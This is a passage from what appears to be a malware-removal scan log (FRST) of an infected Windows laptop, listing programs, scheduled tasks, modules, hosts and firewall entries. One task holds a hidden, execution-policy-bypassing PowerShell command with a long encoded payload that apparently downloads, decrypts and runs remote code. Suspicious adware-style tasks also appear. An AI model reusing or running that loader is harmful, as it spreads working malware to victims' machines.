) TOSHIBA Supervisor Password (HKLM-x32\...\{A208044D-A88B-4ACF-AE95-E4F213E6EDC0}) (Version: 2.00.02 - TOSHIBA Corporation) TOSHIBA USB Sleep and Charge Utility (HKLM-x32\...\{E487EE7D-EAAA-4E2A-9116-E3B477D8A74F}) (Version: 1.2.1.0 - TOSHIBA Corporation) TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.2.8.64 - TOSHIBA Corporation) TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.0.1.8 - TOSHIBA Corporation) Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft) Webroot AntiVirus with Spy Sweeper (HKLM-x32\...\{1FCC574F-AFA2-4432-9EF1-79CA7BA73431}_is1) (Version: 6.1 - Webroot Software, Inc.) WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.66 - WildTangent) Windows Driver Package - TOSHIBA (FwLnk) System (11/19/2006 1.0.0.3) (HKLM\...\D27D7E9318CFA89EDDE8D448B507A8EB725F5A52) (Version: 11/19/2006 1.0.0.3 - TOSHIBA) Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation) Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {0F85781D-2C97-4D9D-9632-7EFDBF2EB0A8} - \WebBarLaunchTask -> No File <==== ATTENTION Task: {11DD6B62-185E-4E63-8F45-4FFC691C9B06} - \WebBarUpdateTask -> No File <==== ATTENTION Task: {263A5680-836D-4B0F-BB3C-249E8B753F8E} - System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [2009-11-06] (Webroot Software, Inc.) Task: {360E6CE9-8445-48AB-A36D-4F5A65A97683} - \DriverUpdate Startup -> No File <==== ATTENTION Task: {3A51EE16-6E79-450D-A8FD-2A0BD34DFD95} - System32\Tasks\PubMach138 => C:\Users\Barbara\AppData\Local\RustiSens806\Rutransform.exe [2016-01-23] () Task: {4D77D01E-DB5F-4653-8377-E8C2AB310C52} - \Scheduled Update for Ask Toolbar -> No File <==== ATTENTION Task: {79092768-F5C7-4D08-B1B7-9C7A7A0F414F} - System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAG8AcABlAG4AeQBlAHMALgBpAG4AZgBvAC8AdQAvAD8AYQA9AGkAegA3ADkAWQBjAGsAcQB6AFEARABQAHAAagB4AFYAQwAxAE4AdgBjAHQAWQBXAHQAWQBlAG4AeABjAFUATgBLAHIAVABaAGYAZQBXAFIARwBCAHgAMwB5AHYAYgBpAGMARwB5ADMARABsAFgAOABkAEMAMQBiAHcARgBoAF8AdwB2AE4ATwAxAE4ANgBqAHoARQA4AFUAagAyAGoAawA1AHUAVwAyAFUAQwA1AHEAWQBOADQAdgBfAHcANABRADQAQwBiAEYAdgBaADcAcgB5AEsATAAwADYANwBKAEYATgBOAGcAVgB5AGYAQQBBAHQANgBnAEkAMQBZAGIAbQBHAFcAQQBoAGkATABxAGUAQQA3ADgAeAAtAF8ASwBRADYAMwBUAHMAdgB1AEsAcwBBAGgAaQB0AGQAQwBPAFAAOQBXADgAOQAyAFYATgBVAEMAcABaADAATAB5AGoASwB2AGYARABjAEcAcwB3AG0AdgBqAF8ANQBYAFIANwBDAGMAWQA2AC0AbwBUADAAQQAwAFUAOABpAFQAcgA2AFYASQBRAFYAdgByAE8AUABrAEUATABTAGsARQBSAFIAegB6AEgAQQBUAG0AcQBRAHgANwBPAGsAUQBFAE0AbQBWAG0ANQBlAGgAWgBnAFQAVQB2AGIAWQBlAHMATQBYAE4ANABLAEIATgBPAGcAYgBUAFQASABqAE8AZABuAHMARQBiAGQAMABpAFUAdgB1AEcAeAAyAEYATwBIAHoAQwBWAHYAQwB1AG0AdgAzAEQAVABLAHkAMwBQADIAMwBvADUAaABwAGcASQBYAFUASABvAGsAZwBKAEYAZwBkAFIAawBPAHAAYwBjAE4AZABoAFgASwBnAGgAVgBOAGkAZQAyAGQATQBIAHQAZgBuAGcAUgA0AFQARQBQAEkAagA4AGwAYwBoADYAYQB4AFMAMAB1AEoAWQBvAGMAWQBzAG4AeAB6AEYAVwBEAHQAeQB5AHYARAAxAGQASwBZAGcAUwA4AHkAQQBKAGcAcwBoAGkAVgBzADcARAB1AHgAcwBLAGIAdAB2ADUARABlAGgAcQBBAEQARAAzAG4AdgBZAE8AagBnAE0AdQBqAEMAcQBPAFQATwAtAEYAWABuAEoAOABUAG4ARwBxAG4AUAAyAGcASgBJAGoAYgA2AEcAYwBLADQAbABLADEAawAyAGMANwBGAGQAYQBTADYAMABfAHMAdAB5AEkAYgBJAC0AcQBQAHUAbwBOAGQAZwBkAFcAQgB6AC0AZAB5ADgAbwB4ADAAbgBnAGEAZgBVAHQAVABDAGsAdgBsADYAWgA5AHUAUQBrADMAMABYAGMAZwBoAFQAdwBuADgAUwByAFQAbQB1AGEAYgBtAEwANABOAEYAMABrAGIAYgAyAGcASwB5AEEAQgBNAHkAcgBFAEIAQwA4AFAAXwB2AFgAVABiAHEAbwBOAEQAZABVAGYANgB6AHUATABKADUATwBZAEcAOQBHAC0AdwBOAFIAMAA2ADEAMgA2AGEAaABZAHcAaQBvAFIANQBkAG0AUAAwAHEAZABkAHgAcQBsAGgAXwBxAGgAOAByAFYATABSAEMANgBnAHkAbgA1AF8ATQBOAE8AOABIADkAUQBlAEcAZAB0AEsAMwAxADQAcgA1AFIAYQBFAC0AWQBHAFgAdAAtAE4AQwBoAGcANwBMADkAbQBWAFMAZABiAHoAQwB3AG4AcABNAEoARABMADQAUgBVAEIAMABSAHkAZgBfAHEAegBWAG4ASQBDAHkAdQBlAFoAYQBoAEwAWgBEADQAcwA4AFIANQBtAGIAUQA4AE0AZQBMAHYAbgBFAG4ASABKAEkAQwBsAGcAMwBnAGgATgBNAGoAUABDAEQAMwBDAEYAVgBhAGsAMQBYAHAARwA4AEMASQBpADEAQgBnAE4AeQB0AGEAagAzAGIAbgBkAG8AeQBDAHgASwB1AG8AeABiAE0AQQB6AFgATABNAHQAaABjADkAbAA3ADMANgAxAGUAQwBoAHkAUAA4AHgAdQBOAEYAVwBWAGUAeABOAGoAawBzADEANwB5AFMAUgByADkAYwBxAEUATAByADYAUgByAFcAWAB1AFYATgAyADkANwBJADIANAB0ADEAcwBrAE8AcwBQAGcAawBUAE0ASQBDAEMAXwBqAHIAUgA4AHIAMwBxAFAANQAyAHYAdABNADIANQB5AHkAUABMAE8AeQBnADEAYQAwADAAVQBjAEYAYQBtAHIAWQBoAGsASQBPAHQATABTAFAAZQB6AE8ASAA5AG4AYQBjAEsARABqAHMAQwBkADYAYgBqAFkAagBDAFMAMgB2AFQAXwB5ADYAQgAzAFUAagBhAEQAaAAwADkARQBYAGIAeABhAFYAJgBjAD0AdAA2AG4AcwA4AEkAMABBAFMANgBqAGgASQBxADkAYQBqAGsAZwAzADkAYQB4AHMAWQBHAFgASgBnAHEARwA2ADcAOQBmAGwAQQBPAEYAbgBPAE0ANAAwAFEARAAxAFkANgBpAE0ARgBWADUAOAAxAEcAMgBPAEoAUQBOAHMAOAB0ADAAbgBNAGkAdwBzAE4ASgA0AE0AMwBZAGUAVgBmAEcAdQBfADYAYQBRAF8ARQBaAG4AMgBEAGIARABRAF8AVAB5AEwAMwBXAG8AdgBuAFYAOAA1AF8AZgBmAGwAOQBYAEYAbgBsAFAAeQBYAFEAOAByAGUAZQBhAGYANgB3AFIAZQBXAE0AUQBXAGkAagA2ADEAeAAtAFQAWABzAHEANgBCAFoAVgBpADIAMABaADQAVQBLAE8AeAB1AFcAbgBFAHUAeQBrAGQAaQBEAHIAYwA5AGgAVwBIAGYANwBjAG0AeABVAHAAawBLAG8ASgAtAHQAXwA2ADQAUgB0AFoATQA2ADQAYwA0AG8ARwAzAEcAaABjAHkAMQB0AFkARQBrAE4AXwB0AF8AQwBoADEAVgBDADMAdABIAFIAcABwAGsAZQBMADIAVQBjADkATgA3AF8AUQBhAFEASQBqADUARwA3AHkAMwBEAHUAMwB2AGIAXwB0AFkANwBmAFYAcgBTADMARQB5ADUANwB5AGUAWQBZAEgAaQBLAHgATwBPADQAQwBIAHoANABmAG4ARgBGADIAMABJAGkAagB1AHgAVABNAG4AaABBAEMAMwBCAHEASwAtAGcAXwBJAG0ANgBPAE0AQgBIAGwAZwAwAHYAZwBOAEQAWAAtADUAdQB4AGIATgBnAFMAeQBsAGUASwBjAFgAYgBQAHQAbgBpAGoAMQBnAEEAXwBtAGkALQBxAGQASwB3AHUAbgBvAF8AOQBLAG4AMwBPADkAQwBWAFYAVABSAC0AdQBTAFAAUgBLAEcAMwBIAEQATAB6AGgAWABQAEsAMABEADgATQBJADkAeQB5AE4AZgBIAFEAYQBWAE0AMwBuAC0AYQBiAGgAWQBpAFgASwBwADkATgA0AHgANgB2AEsAeABNAGYASQBrAEEARwB6ADIARABCAGkAeQA3AFcANgBVAHcAbQBjADUAaABmAGQASAB5AFUAUAA5AHQAagB0AEMAVwBvAE0AYQBuAFIAbwBRAFgAZwBYADgAdABFADAAdwAxAHIAVwBjAGUAYgBGADYAVgBkAG8AdgA4ADUANQBoAG8AYgBoAHIASgBKAEMAcAB6ADkATAB3AFkAYwBOAGkAdABlAEYAUQBqAHIAUAB0AGcAUQBoAGoAWgA2AFoAaQBiAGsARgBjAFgANAA4AFUAaABWAGUATABNAEEAUgBwAHMAbQBIAHYALQB3AGsAVwBqAHkANQBnAFUAdgB6AEcAOQBRAEUAbQA0AGMAYQBFAEMAWAB0ADMASQA1ADkAeQBhAEUAcQBoAFYAWQB5AHEAeQBmAEUAeQBuAF8AZAA3AHYANQBDADAATgA5AG8AQQBIAE4AeQByAF8AQwBVAFgATgBXAE4AdgA5AEMAbABVAGgATwAyAHIARQBRAFYAQQByAEEAcwBHAGEAUQBSADYAdABYAFIAVgA5AE0AVQAwAGEAMwBRAEcAUgBrAHkAcQBWADkAUABHAEEAUABRAEIAdABCAGsAaABQAHcARABVAGcAbQBOAEoAbQBSAFgANgBuAHAAcwBOAGgAcQBOAGYAMQBxAG8ARAA0AHkANwBwAFIAaAA1AGQAUgBpAHIAcwBaAHYAZAA1AGcAcgBqAGcASwBEAEMAMQBFAGoANwBPAG0AMwBXAGkAMQBwAGIAUgBfAHEAMwBRAEMAQQBlAFkATwA1ADkAdQBqAHkAVwB2AG4AdwA4ADIAdAAzAFgANwBPAE4AZwBMADkANwB0AC0AdwBNADMAWAAxAGoARwA0AGsAVQBsAEYAQQBtAHEAVwBxAHUAQgBpAHgAWAAxAFMAZgB1AEcATAA1ADAAQQBNAEkAbQBjAHAAOABqAGkAMABDAFgAaQBtADEAcQBaAGcASwBfAFIAdQB2AEYAcgA3ADUAcQBCAG4ASABpADYATgBZAF8AVwBmAFAAdgBtADgAMQBHAEQAOABWAHYAZgBFAEcAZABJAFMANgBkAEoAUgBRAG0ATwBvADgAUwBIAHEAdQBSAFoAegA0AEEAUQBjAGYATQBSAE0AaQBDAGoAawBVADcAcABTAFAAagBlAGMAZwA5AF8AUQBqAEcAUQBTAHcANABiAFcAVwBDAFgAXwA4AEQATgBSAEUAcgB5AGMAMgBQAFMARgB5AHkAMwBaAEcAdwBHAGYAeQBnAHEAUABiADMAQwB6AFoAVgBOAGIAUQA0AFMAcwBOAGQALQB5AEIAUQBYAFAANQBPADYAMwBVAFAAXwB3AG8AaQBuAGcARQBjAFIARwBEAEcAQQBrAFUAdQBNAEQASwBIAFEAbQAzAGsAVQBOAGcANQBlACYAcgA9ADQANAA4ADgANAAxADIANQA5ADEANAAxADkANAAyADQAMwA1ADYAIgA7ACQAcwB0AHMAawA9ACIAewA3AEUANwA4ADAARAA0ADcALQAwAEQAMABCAC0AMABFADAANQAtADAAOQAxADEALQAwAEYAMABDADAAOAAwAEEAMQAxADcARAB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIASQBMAE8ASABGAFAASwBRACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA Task: {81FDB296-4C8A-4B83-A959-123B2D5E60D2} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto Task: {9858409A-6BF2-406E-B2D7-4793E237FFF1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {A4D38401-1428-46C7-AD2C-73A09F16C38F} - \DriverUpdate Scan -> No File <==== ATTENTION Task: {A5190072-4239-4907-9D98-7871BD0DDBB9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated) Task: {AE8343D2-863F-44E2-8FAE-B123C5BA930C} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe Task: {B9545D91-42EE-4132-B2FA-A6D10D25BE8A} - \One System Care Task -> No File <==== ATTENTION Task: {BB42D120-21AC-4A10-8D46-C325D413A0DF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {C02F531F-476C-495D-BFA2-503EB2277BDB} - System32\Tasks\Brooucnejo => C:\ProgramData\Brooucnejo\1.0.7.1\semsikeh.exe Task: {DB208AD7-F908-420A-8C84-CB29D9D5AF30} - \One System Care Monitor -> No File <==== ATTENTION Task: {EA39D524-1CC9-4D84-86F5-6FC1F8939BAC} - \UpdateAdmin -> No File <==== ATTENTION Task: {FC491F5B-D745-4FC7-A39F-466825B5D486} - System32\Tasks\OutstandinDivisio6 => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe Task: {FF9497ED-7720-46DB-A12E-809C65F6789A} - \One System CarePeriod -> No File <==== ATTENTION (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\OutstandinDivisio6.job => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe Task: C:\Windows\Tasks\PubMach138.job => C:\Users\Barbara\AppData\Local\RUSTIS~1\Rutransform.exe Task: C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe Task: C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe>/ScheduleSweep=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A C:\BarbaraӖ眇扥潲瑯ӆTaskName=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A ApplicationName=C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) ==================== Loaded Modules (Whitelisted) ============== 2007-09-06 12:27 - 2007-09-06 12:27 - 01331712 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll 2009-02-27 10:11 - 2009-02-27 10:11 - 00335360 _____ () C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL 2015-01-25 10:26 - 2006-01-12 09:24 - 00141312 _____ () C:\Windows\system32\spool\PRTPROCS\x64\lxcypp6c.dll 2014-11-18 01:04 - 2009-04-22 01:06 - 00120320 _____ () C:\Windows\system32\atitmm64.dll 2009-03-07 16:15 - 2009-03-07 16:15 - 06986552 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll 2008-07-14 13:35 - 2008-07-14 13:35 - 00107832 _____ () C:\Program Files\TOSHIBA\FlashCards\TWarnMsg\TWarnMsg.dll 2009-05-03 01:35 - 2007-04-23 11:09 - 00016896 _____ () C:\Program Files\TOSHIBA\Toshiba Assist\NotifyX.dll 2007-12-19 15:13 - 2007-12-19 15:13 - 00078848 _____ () C:\Program Files\TOSHIBA\HDD Protection\NotifyThp.dll 2009-03-12 22:08 - 2009-03-12 22:08 - 00048640 _____ () C:\Program Files (x86)\Toshiba\PCDiag\NotifyPCD.dll 2007-04-24 23:47 - 2007-04-24 23:47 - 00012288 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll 2009-02-10 14:32 - 2009-02-10 14:32 - 00076288 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll 2014-11-18 01:05 - 2014-11-18 01:05 - 00014848 _____ () C:\Windows\assembly\GAC_MSIL\AxInterop.WBOCXLib\1.0.0.0__90ba9c70f846762e\AxInterop.WBOCXLib.dll 2008-11-25 13:19 - 2008-11-25 13:19 - 01193472 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Implementation\64\wbocx.ocx 2009-01-30 13:41 - 2009-01-30 13:41 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll 2014-11-18 01:05 - 2014-11-18 01:05 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll 2009-02-16 19:09 - 2009-02-16 19:09 - 00868352 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMediaLibrary.dll 2009-02-16 19:09 - 2009-02-16 19:09 - 00007680 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvcPS.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WebrootSpySweeperService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WRConsumerService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WebrootSpySweeperService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRConsumerService => ""="Service" ==================== EXE Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2015-10-05 21:16 - 2015-11-14 11:49 - 00000030 ____A C:\Windows\system32\Drivers\etc\hosts 0.0.0.1 mssplus.mcafee.com ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\TOSHIBA-1.jpg DNS Servers: 192.168.1.254 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == (Currently there is no automatic fix for this section.) ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe FirewallRules: [{EFE7CF45-1DAA-444A-9D68-63305F72B7B9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PowerCinema.exe FirewallRules: [{80374A2A-F190-4E76-B229-C33B434E33CC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMService.exe FirewallRules: [{1B9C4756-D936-4A65-8F71-23B96B9920E7}] => (Allow) C:\Program Files 